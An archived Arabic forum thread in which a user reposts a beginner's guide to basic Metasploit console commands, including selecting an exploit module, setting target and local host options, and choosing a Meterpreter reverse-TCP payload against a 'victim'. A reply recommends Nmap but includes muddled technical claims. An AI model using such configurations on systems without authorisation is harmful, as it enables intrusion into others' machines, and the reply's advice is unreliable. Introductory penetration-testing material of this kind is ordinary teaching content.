منتديات الشروق أونلاين

منتديات الشروق أونلاين (http://montada.echoroukonline.com/index.php)
-   منتدى الأنترنت (http://montada.echoroukonline.com/forumdisplay.php?f=22)
-   -   اوامر الميتاسبلويت الاساسية (http://montada.echoroukonline.com/showthread.php?t=314888)

SisinYou 12-09-2015 01:55 PM
اوامر الميتاسبلويت الاساسية
 
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة



الامر
كود PHP:
show exploits
اظهار جميع ثغرات اداة الميتاسبلويت

كود PHP:
show payloads
اظهار جميع البايلود في مشروع الميتاسبلويت

كود PHP:
show auxiliary
يستخدم لاظهار ثغرات الفحص كـ فحص منافذ وبورتات مواقع و اجهزة ألخ

كود PHP:
show options
يستخدم لأظهار خيارات الثغرة المستخدمة

كود PHP:
use
يستخدم هذا الامر لأستخدام ثغرة ما كمثال .. use unix/***app/php_vbulletin_template

كود PHP:
set
يستخدم هذا الامر لتعديل خيارات ثغرة ما... انظر فوق ^_^ قلنا show options لأظهار خيارات الثغرة اما هنا لتعديل خيارات ثغرة ما او بالاصح ادخال الخيارات الى الثغرة من اي بي وبورت الى ما لذلك


مثال عليها .. من خيارات او شروط الثغرة ان تضع الاي بي المستهدف من موقع او جهاز وان تضع البروت ... يوجد غير هذان الخياران لكن هذا ليس موضوعنا وانما كيف التعديل على خيارات ثغرة ما ... الامر يكون هكذا
البورت المستهدف يرمز بهذا RPORT
بورت جهازنا لوصول التبليغ او اقصد بنجاح الثغرة والتحكم من جهازنا يرمز له LPORT
الاختلاف في كلمة L وكلمة R
عندما تشاهد هذه الرموز فوق تبدأ بـ L فأعلم انها تتكلم عنك واما اذا بدأت بـR فانها تتلكم عن الضحية
الامر يكون بالتعديل على خيارات الثغرة بهذا الامر
set RPORT 9999
هكذا بنكون عدلنا على الثغرة ووضعنا اي بي الهدف اما اذا قلنا كذا
set LHOST 129.168.1.100
كذا بنكون ادخلنا اي بي جهازنا في خيارات الثغرة لكي نتنصت عليه من النت كات او غيره
الان الاوامر جاهزة كذا

الآن لنفرض تريد اختيار بايلود معينة والنفرض بايلود الميتربريتر القوية .. ان شاء الله بنتطرق للبايلود وشرحها ووظيفتها واستعمالاتها

الان نرجع لموضوعنا ..يكون الامر هكذااا
set PAYLOAD windows/meterpreter/reverce_tcp


وبأمكانك تغيير البايلود التي واسمائها موجودة عن طريق الامر السابق
كود PHP:
show payloads
كود PHP:
show encoders
لأظهار ثغرات التشفير .. ليس هكس وانما تشفيرات من نوع قوي وفعال وايضا عن صنع اي بايلود فأنه يتم صناعته مشفر ولذلك ايضا يوجد هذه الانواع encoders للتشفير اكثر واكثر

كود PHP:
show nops
لم اخالطها من قبل لأعرف معناها لكن اظنها للغة والبفرو كذا شيء ان شاء الله بنتطرق لها

.....##

منقول :16:

منير7 12-09-2015 04:31 PM
رد: اوامر الميتاسبلويت الاساسية
 
هناك أداة تغنيك عن كل هذه الاوامر و اسمها Namp يمكن إضافتها للميتا ، حيث يمكنها فحص الشبكات و المواقع و السيرفرات ، و أيضا تعجبني الإضافة المميزة في الاصدار الجديد في مجال الحماية ، حيث يمكنها فحص البورتات المفتوحة في الشبكات فحص شبه كامل ...

ملاحظة بسيطة كود الـ user الخاص باليونكس الذي أرفقته غير كامل و من الممكن أن يسبب عطل في وظيفة xcode إذا استعمل على حالته ، ارجو تصحيحه

تشكر على شرح الأكواد اخي هي مهمة جدا للمبتدئين ، و لكن أنصح أي مبتدئ ان يعي جيدا عمل Homebrew الخاص بلغة ruby ، و كذلك العمل بـ namp من خلال homebrew ، لأن العمل بـ namp كأداة مستقلة يستلزم بعض التركيز و خبرة في لغات البرمجة و أكوادها ، و اللغة الاساسية التي يجب ان يركز عليها المبتدئ هي لغة ruby ، و كذلك يجب معرفة PostgreSQL و العمل به من خلال homebrew ، و أيضا كيفية تشغيل السيرفرات و إيقافها ، و كيفية صنع الـ Alias و العديد من الأشياء الاساسية الاخرى لا يسعني ذكرها جميعا لأنها معقدة نوعا ما ، و لكن مع التعود ستصبح أسهل من شرب الماء بالنسبة لك


الساعة الآن 07:20 PM.

Powered by vBulletin
قوانين المنتدى